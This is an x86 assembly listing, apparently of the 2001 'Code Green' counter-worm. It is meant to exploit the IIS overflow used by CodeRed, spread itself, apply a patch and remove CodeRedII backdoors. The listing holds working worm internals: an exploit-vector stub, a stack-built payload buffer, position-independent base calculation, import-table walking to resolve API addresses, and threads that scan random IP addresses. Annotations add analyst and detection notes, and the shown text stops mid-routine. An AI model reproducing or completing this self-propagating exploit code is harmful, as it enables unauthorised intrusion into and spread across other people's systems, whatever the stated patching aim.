
?? codegreen.asm

?? 蠕蟲—綠色代碼的源程序
; Code Green (AntiCodeRed/IDQPatcher/whatever you want) V1.0 BETA [23.08.2001]
; assemble with:
; 	ML /Dmasm /c /Cx /coff CodeGreen.asm
; link with:
; 	LINK CodeGreen.obj /entry:_Entry /subsystem:windows /base:65536

;aims:
; * patch vulnerable systems
; * remove CodeRedII backdoors

;known problems:
; * plenty of probs ... ;(
; * propagation threads will stop (criticalsection), in case only one thread should block while sending
; * don't know if CodeGreen will correctly determine system language
; * don't know if CG will correctly apply patch to all systems
; * don't know if this code would work at all (had not enough time to excessively debug it;()

;known bugs:
; * currently none (inform me if you should find some weak code)

;credits:
; * @eEye: you guys surely did great work finding that bug
; * @MS: thanks for delivering a hotfix that works with system privileges
;	(plus: does not show messagebox when executed with system privileges;))
; * @CodeRedI author: thanks for this great exploit vector; good job
; * @CodeRedII author: sorry for providing code/the base for a code
;	that will/could potentially take your systems
; * @all: it's my first one ...
;	... so please don't flame me for weak coding ...
;	... be nice guys and send me your modified versions of this code.

;debug instructions:
; * assemble CodeGreen.asm
     (or remove txt-extension from CodeGreen.exe.txt [at your own risk])
; * debug your iis
; * go to 0x7801CBD3h (call ebx)
; * set breakpoint there
; * execute betaversion and walk through the code
; * be sure to stay offline, especially when using the preassembled version

;DISCLAIMER:
; (blahblah) ... i will not take responsibility for any bugs in this code
;(THIS IS ONLY A BETA VERSION, WHICH HAS BUGS IN IT).
;in fact i will not take responsibility for this code/included files at all.
;if you use this code or the pre-assembled version, you should know what you are doing.
;hell ... if you can't keep the code on your local iis, it's your fault.
;(i really don't know if this code is working at all
; ... currently it's 10:20 a.m. in germany and it's getting pretty late ...
; ... but tomorrow i will be on vacation and perhaps there might be someone out there,
; who could finish my work.)

;sidenote: i did not have the time to optimize the code and to
	write some nice comments; sorry.

.386
.model flat, stdcall
option casemap:none

; ***** ***** Includes ***** *****

	include windows.inc
	include kernel32.inc
	include advapi32.inc
	include wsock32.inc
	includelib kernel32.lib
	includelib advapi32.lib
	includelib wsock32.lib

CGLen EQU CGEnd - CGBegin
CGInitLen EQU CGEnd - CGInit
UDataLen EQU UDataEnd - UDataBegin

.Code

; ---------------------------------------------------------------------
; _Entry -- entry point of the stand-alone build (see "/entry:_Entry" in
; the link line at the top of the file).
; Re-protects CGInitLen bytes, starting at the run-time address of
; AdjustCodeSegment, as PAGE_EXECUTE_READWRITE and continues at
; _Prologue2. On failure it breaks into the debugger and returns.
; NOTE(review): presumably needed because variables addressed as
; [ebp][...] later on live inside the code section -- their definitions
; are not in this part of the listing, so confirm there.
; Analyst note: a process switching its own code pages to
; PAGE_EXECUTE_READWRITE is a behavioural indicator of self-modifying
; code and is worth alerting on.
; ---------------------------------------------------------------------
CGInit EQU $
	_Entry:
		.Data
			; receives the previous page protection from VirtualProtect
			OldProtection	DD	0
		.Code
			; call/pop pair: the call pushes the run-time address of the
			; next instruction, which the pop then reads into ebp
			call AdjustCodeSegment
		AdjustCodeSegment:
			pop ebp
			; CGInitLen = CGEnd - CGInit (EQU near the top of the file)
			mov eax, CGInitLen
			invoke VirtualProtect, ebp, eax, PAGE_EXECUTE_READWRITE, offset OldProtection
			cmp eax, TRUE
			je _Prologue2
				; failure path: breakpoint, fetch the Win32 error code into eax, return
				INT 3
				call GetLastError
				ret

	; _Prologue2 -- loads msvcrt.dll into the current process and, on
	; success, continues at _DEBUG (the commented-out alternative target
	; is _CGEntry). On failure: breakpoint, GetLastError, return.
	_Prologue2:
		.Data
			msvcrt_dll	DB	"msvcrt.dll", 0
		.Code
		invoke LoadLibrary, offset msvcrt_dll
			mov esi, eax						;esi -> msvcrt.dll
			; esi = module base + fixed offset 00050824h. A hard-coded offset is
			; only meaningful for one specific build of msvcrt.dll.
			; NOTE(review): esi is not read again in this part of the listing
			; before CGInit_BuildCodeGreen reloads it, so the purpose of the
			; offset cannot be confirmed from here.
			add esi, 00050824h
			; eax still holds the LoadLibrary result; NULL means the load failed
			cmp eax, NULL
			jne _DEBUG ;_CGEntry
				INT 3
				call GetLastError
				ret

	; _DEBUG / _CGInit -- start of the initialiser proper. Declares the
	; initialiser's data, computes the code-length string (twice: once
	; under _DEBUG, once after the data declarations), zeroes ebp and jumps
	; to the API-address collection step.
	_DEBUG:
		call LaengeCodeGreenCodeBerechnen

	_CGInit:
		.Data
			; Buffer handed to WSAStartup at CGInit_InitializeSockets.
			; NOTE(review): the field sequence resembles a Winsock WSADATA
			; structure -- confirm against the SDK headers.
			CGInit_WSAData			DW	0
							DW	0
							DB	257 DUP (0)
							DB	257 DUP (0)
							DW	0
							DW	0
							DD	0

			; The next four items are not referenced in this part of the
			; listing. 7F000001h reads as 127.0.0.1 if taken as a
			; most-significant-byte-first IPv4 address.
			CGInit_CurrentIP		DD	7F000001h
			CGInit_IoctlSocket_Arg		DD	0
			; 16 bytes in total; presumably a sockaddr_in -- TODO confirm
			CGInit_SockAddr			DW	0
							DW	0
							DD	0
							DD	2 DUP (0)
			; 65 dwords, the first two preset to 1; presumably an fd_set
			; (count + descriptor array) -- TODO confirm
			CGInit_fd_set			DD	1
							DD	1
							DD	63 DUP (0)
		.Data?
			; written by LaengeCodeGreenCodeBerechnen with the value CGLen
			CGInit_CGCodeLen		DD	0 ;Code
			; not written in this part of the listing
			CGInit_CGLen			DD	0 ;Exploit+Code
			; 6000-byte uninitialised buffer; not referenced in this part
			CGInit_NewCodeGreen		DB	6000 DUP (?)
		.Code
		call LaengeCodeGreenCodeBerechnen
		; ebp is the offset added to every [ebp][Symbol] reference below.
		; With ebp = 0 those references resolve to the link-time addresses,
		; i.e. the code runs at the address it was linked for. (_CGEntry
		; computes a non-zero ebp when the code runs relocated.)
		xor ebp, ebp ;set initial base-pointer
		jmp CGInit_Get_Used_PropagationThreadFunctions

			; LaengeCodeGreenCodeBerechnen (German: "compute length of the
			; CodeGreen code").
			; Stores CGLen in CGInit_CGCodeLen and writes the same value as
			; four ASCII decimal digits to CodeGreenExploitLenStr (defined
			; outside this part of the listing).
			; In:    nothing in registers
			; Out:   nothing in registers
			; Clobb: flags only; all general registers are saved with pushad
			;        and restored with popad
			; Assumes CGLen < 10000 -- the first quotient is not reduced to
			; a single digit before 48 ('0') is added.
			LaengeCodeGreenCodeBerechnen:
			pushad
				mov eax, CGLen
				mov [CGInit_CGCodeLen], eax
				lea esi, CodeGreenExploitLenStr

				; thousands digit
				xor edx, edx
				mov ecx, 1000
				div ecx ;EDX:EAX / ECX -> remainder in edx, quotient in eax
				add eax, 48			; 48 = ASCII '0'
				mov [esi], al
				mov eax, edx			; continue with the remainder

				; hundreds digit
				xor edx, edx
				mov ecx, 100
				div ecx
				add eax, 48
				mov [esi+1], al
				mov eax, edx

				; tens digit
				xor edx, edx
				mov ecx, 10
				div ecx
				add eax, 48
				mov [esi+2], al
				mov eax, edx

				; units digit (what is left after the last division)
				add eax, 48
				mov [esi+3], al
			popad
			ret


	; CGInit_Get_Used_PropagationThreadFunctions
	; Fills ProcTable with one address per API named below. Each stanza
	; does the same three steps:
	;   mov eax, <Symbol>   ; address the linker assigned to the symbol
	;   mov eax, [eax+2]    ; dword stored 2 bytes into the code at that address
	;   mov eax, [eax]      ; dword that value points to
	; and stores the result at ProcTable + API_<name>.
	; NOTE(review): this matches reading the operand of a linker-generated
	; "jmp dword ptr [slot]" import stub (2 opcode bytes + 4-byte slot
	; address) and then the slot itself, which would yield the real entry
	; point of the imported function -- confirm against the linked image.
	; ProcTable and the API_* offsets are defined outside this part.
	; Analyst note: the set collected here (critical sections, socket,
	; ioctlsocket, connect, select, send, closesocket, GetSystemTime,
	; Sleep) is the API surface the propagation threads are given.
	CGInit_Get_Used_PropagationThreadFunctions:

		; kernel32: EnterCriticalSection
		mov eax, EnterCriticalSection
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_EnterCriticalSection], eax

		; kernel32: LeaveCriticalSection
		mov eax, LeaveCriticalSection
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_LeaveCriticalSection], eax

		; wsock32: socket
		mov eax, socket
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_socket], eax

		; wsock32: ioctlsocket
		mov eax, ioctlsocket
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_ioctlsocket], eax

		; wsock32: connect
		mov eax, connect
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_connect], eax

		; wsock32: select
		mov eax, select
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_select], eax

		; wsock32: send
		mov eax, send
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_send], eax

		; wsock32: closesocket
		mov eax, closesocket
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_closesocket], eax

		; kernel32: GetSystemTime
		mov eax, GetSystemTime
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_GetSystemTime], eax

		; kernel32: Sleep
		mov eax, Sleep
		mov eax, [eax+2]
		mov eax, [eax]
		mov [ebp][ProcTable+API_Sleep], eax

	; CGInit_BuildCodeGreen
	; Assembles one contiguous buffer on the stack: CGExploitLen bytes
	; copied from CodeGreenExploit, immediately followed by CGLen bytes
	; copied from _CGEntry. The buffer address (esp after the pushes) is
	; stored in ptrNewCodeGreen.
	; Stack layout afterwards: [esp] = number of dwords reserved,
	; [esp+4...] = the copied bytes, remainder still filled with 90h.
	; The stack pointer is not restored in this part of the listing.
	; CodeGreenExploit, CGExploitLen and ptrNewCodeGreen are defined
	; outside this part.
	CGInit_BuildCodeGreen:
		lea esi, [ebp][CodeGreenExploit]	; esi = source of the first copy
		mov eax, CGExploitLen + CGLen
		mov ecx, eax
		shr ecx, 2 ;div 4
		inc ecx				; one extra dword covers the remainder of the division
		mov ebx, ecx	;ebx: NrOfPushs
		; reserve ecx dwords, each pre-filled with 90909090h
		CGInit_ReserveStackLoop:
			push 090909090h
			loop CGInit_ReserveStackLoop
			push ebx	;first DW in stack-field holds NrOfPushs

			mov [ebp][ptrNewCodeGreen], esp

		CGInit_CopyCodeGreenExploit:
			mov ecx, CGExploitLen ;eax
			lea edi, [esp+4]		; skip the count dword
			cld				; copy upwards
			rep movsb

		; edi now points just past the first copy, so the second copy is appended
		CGInit_AddCodeGreenCode:
			lea esi, [ebp][_CGEntry]
			mov ecx, CGLen
			rep movsb

	; CGInit_StartPropagation
	; Resets the shared state, initialises Winsock, starts one thread at
	; RandomGenerator, initialises two critical sections, then starts
	; threads at _ThreadFunction -- one every 100 ms -- until NrOfThreads
	; is no longer below MAX_NR_OF_THREADS.
	; Every thread receives ebp (the base offset) as its parameter.
	; NOTE(review): NrOfThreads is not changed inside this loop; presumably
	; the worker threads update it themselves -- confirm in _ThreadFunction,
	; which is outside this part of the listing.
	; Analyst note: a burst of threads created at a fixed 100 ms interval
	; is a recognisable process-behaviour pattern.
	CGInit_StartPropagation:
		mov [ebp][NrOfThreads], word ptr 0
		mov [ebp][EndThreadsFlag], byte ptr 0
		mov [ebp][CurrentIP], dword ptr 7F000000h ;does propagation thread only send one copy to the local IIS?
			;7FFFFFFDh ;=127.255.255.254 => no random IP generation, hits local Port 80 1 time

		; WSAStartup(0101h, &CGInit_WSAData) -- requests Winsock version 1.1;
		; the return value is not checked
		CGInit_InitializeSockets:
				push offset CGInit_WSAData
				push 0101h
			CALL WSAStartup

		; CreateThread(NULL, 0, RandomGenerator, ebp, 0, &slot)
		; Arguments are pushed right to left (stdcall). The leading "push 0"
		; creates a stack slot and "push esp" passes its address as the
		; thread-id pointer; "pop eax" afterwards discards the slot, which
		; also overwrites the returned thread handle in eax.
		CGInit_Main_StartRandomGenerator:
			push 0
				push esp
				push 0
				push ebp
				lea eax, [ebp][RandomGenerator]
				push eax
				push 0
				push 0
			CALL CreateThread
			pop eax

		; one lock per name: CritSec_GetIP and CritSec_SendCG
		CGInit_Initialise_Critical_Sections:
			lea eax, [ebp][CritSec_GetIP]
				push eax
			CALL InitializeCriticalSection

			lea eax, [ebp][CritSec_SendCG]
				push eax
			CALL InitializeCriticalSection

		; same CreateThread call shape as above, start address _ThreadFunction
		CGInit_Propagation_ThreadLoop:
			push 0
				push esp
				push 0
				push ebp
				lea eax, [ebp][_ThreadFunction]
				push eax
				push 0
				push 0
			CALL CreateThread
			pop eax

				push 100		; Sleep(100): 100 ms between thread starts
			CALL Sleep
		; signed 16-bit comparison of the counter against the limit
		cmp [ebp][NrOfThreads], word ptr MAX_NR_OF_THREADS
		jl CGInit_Propagation_ThreadLoop

	; CGInit_ResetPropagation
	; Endless loop of the initial thread: sleep 60 seconds, then set
	; CurrentIP to 0 while holding CritSec_GetIP. There is no exit from
	; this loop in the code shown.
	; NOTE(review): judging by the label name, zeroing CurrentIP makes the
	; worker threads start their address selection over -- confirm in the
	; thread code, which is outside this part of the listing.
	CGInit_ResetPropagation:

		CGInit_Main_WaitLoop:
				push 60000	;60 secs
			CALL Sleep

			CGInit_Main_StartRandomIPSearchAgain:
				lea edx, [ebp][CritSec_GetIP]	;EnterCriticalSection
					push edx
				CALL EnterCriticalSection
			; write to the shared variable only while the lock is held
			mov [ebp][CurrentIP], dword ptr 0
				lea edx, [ebp][CritSec_GetIP]	;LeaveCriticalSection
					push edx
				CALL LeaveCriticalSection
		jmp CGInit_Main_WaitLoop

;*********************************************************************************************************************************
;************************************************   EXPLOIT VECTOR   *************************************************************
;*********************************************************************************************************************************
	;esp: 7801CBD3h;		[7801CBD3]:	FF 29	call ebx
	;      ->00D3F0E8 90                  nop
	;	00D3F0E9 90                   nop
	;	00D3F0EA 58                 ! pop         eax
	;	00D3F0EB 68 D3 CB 01 78     ! push        7801CBD3h
	;	00D3F0F0 90                   nop
	;	00D3F0F1 90                   nop
	;	00D3F0F2 90                   nop
	;	00D3F0F3 90                   nop
	;	00D3F0F4 90                   nop
	;	00D3F0F5 81 C3 00 03 00 00    add         ebx,300h
	;	00D3F0FB 8B 1B                mov         ebx,dword ptr [ebx]
	;	00D3F0FD 53                 ! push        ebx				(ebx: 00B02698h)
	;	00D3F0FE FF 53 78           ! call        dword ptr [ebx+78h]		pushes 00D3F100h
	;Stack:
	;	[esp]: 00D3F100h, 00B02698h(esp+4), 7801CBD3h(esp+8)
;*********************************************************************************************************************************
;**************************************************   WORM CODE   ****************************************************************
;*********************************************************************************************************************************
; _CGEntry -- first instruction of the relocatable body (CGBegin marks its
; start; CGLen = CGEnd - CGBegin).
; Works out where the code is actually running so that data can be
; addressed regardless of load address:
;   ebp = run-time address - link-time address (added to every [ebp][Symbol])
;   eax = run-time address of _CGEntry
; ebp is then pushed; the matching "pop ebp" follows later in the listing.
; Analyst note: the call-to-next-instruction / pop pair at the very start
; is the classic signature of position-independent injected code.
CGBegin EQU $
	_CGEntry:
		call _GetEIP
	_GetEIP:
			; Reference disassembly of the sequence below:
			;00011000 E8 00 00 00 00       call        00011005
			;00011005 5D                   pop         ebp				;ebp -> 00011005 at link time; e.g. ebp=00401005 at run time
			;00011006 B8 06 10 01 00       mov         eax,11006h
			;0001100B 48                   dec         eax				;eax=11005 (static!)
			;0001100C 55                   push        ebp
			;0001100D 2B E8                sub         ebp,eax			;ebp = ebp - eax	=> variables can be re-based
			;0001100F 58                   pop         eax
			;00011010 83 E8 05             sub         eax,5			;eax -> _Entry		=> convenient pointer to the start of the code

		pop ebp							;ebp = run-time address of this instruction
		mov eax, $						;eax = link-time address of this mov
		dec eax							;eax=11005 (static!); i.e. eax is the link-time address of "pop ebp"
		push ebp
			sub ebp, eax					;ebp = run-time minus link-time address; i.e. ebp + offset VAR = effective address of VAR
		pop eax							;eax = run-time address of "pop ebp"
		sub eax, 5						;eax -> _CGEntry (varies with load address); the call is 5 bytes long
		;mov [ebp][BasePointerCode], eax

	push ebp			;Push the BasePointer to stack

	;**********************************************************************************
	;***                              init                                     ***
	;**********************************************************************************

	_GetMsvcrtBaseAndSearchGetProcAddrEntry:
		mov esi, 78000000h ;[esp+12]			;esi: 7801CBD3h (see above)

		;call SearchMZHeader

		lea ebx, [ebp][Str_GetProcAddr]
		mov ecx, Len_GetProcAddr
		mov ebp, dword ptr esi

		mov esi, dword ptr [esi+3Ch]
		add esi, ebp

		mov esi, dword ptr [esi+80h]	;78h=ExportTable 80h=ImportTable
		add esi, ebp

		mov edi, esi			;edi -> ImageImportTable
		sub edi, 14h
		SearchIMAGE_IMPORT_DESCRIPTORs:
			add edi, 14h		;edi -> nextImportDescriptor
			mov esi, [edi+12]		;esi -> Name
			add esi, ebp
			mov esi, [esi]
			cmp esi, "NREK"
			jne SearchIMAGE_IMPORT_DESCRIPTORs

		IMAGE_KERNEL_IMPORT_DESCRIPTOR_Found:	;edi -> KernelImportDescriptor
			mov esi, [edi+10h]		;esi -> PIMAGE_THUNK_DATA (Address-Table)
			add esi, ebp		;[ebp][MsvcrtBase]
			mov edi, [edi]			;edi -> IMAGE_IMPORT_BY_NAME - Pointers (Name-Table)
			add edi, ebp		;[ebp][MsvcrtBase]

			xchg ebx, esi			;ebx=esi; esi -> Str_GetProcAddr

			xor edx, edx			;edx : Z鋒ler

			cld
		SearchPointerTableLoop:
			inc edx		
			pushad
				add [esp], dword ptr 4 ;"add edi, 4" after "popad"
				mov edi, [edi]
				add edi, ebp
				add edi, 2		;edi -> ProcName ;shl edi ...
				CompareTheTwoNames:
					repe cmpsb
			popad
			jnz SearchPointerTableLoop ;the strings are not equal

		FunctionFound: ;edx: NrIn_IMPORT_TABLE
			dec edx
			shl edx, 2 ;edx=edx*4
			add ebx, edx
			mov edx, [ebx]						;EDX: GetProcAddr

	pop ebp
		mov [ebp][ProcTable+API_GetProcAddr], edx
		mov esi, edx

		call SearchMZHeader		;esi -> KernelBase

		lea edi, [ebp][DllTable]
	push edi
		mov [edi], esi
